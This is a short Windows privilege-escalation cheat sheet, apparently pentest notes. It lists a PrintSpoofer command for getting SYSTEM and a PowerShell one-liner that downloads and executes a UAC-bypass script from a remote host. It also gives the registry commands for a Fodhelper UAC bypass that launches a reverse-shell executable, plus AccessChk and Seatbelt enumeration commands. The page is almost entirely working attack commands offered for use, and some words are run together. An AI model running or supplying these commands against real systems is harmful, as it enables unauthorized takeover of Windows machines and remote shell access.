Privilege Escalation
SeImpersonatePrivilege
PrintSpoofer64.exe -i -c powershellUse the above command to get system privileges
UAC
iex(new-object net.webclient).downloadstring('http://192.168.1.1/uacbypass.ps1');alt- Fodhelper UAC Bypass 
Use these commands in powershell session:
New-Item "HKCU:\Software\Classes\ms-settings\shell\open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "Delega-
teExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -
Value "powershell.exe -exec bypass -c C:\Windows\Tasks\reverse-shell.exe" -ForceStart a listener to catch the shell and now execute fodhelper.exe
C:\Windows\System32\fodhelper.exeAccessChk
accesschk.exe "currentuser" C:\Windows -wus
accesschk.exe -ucqv servicenameSeatBelt
Seatbelt.exe -group=userLast updated
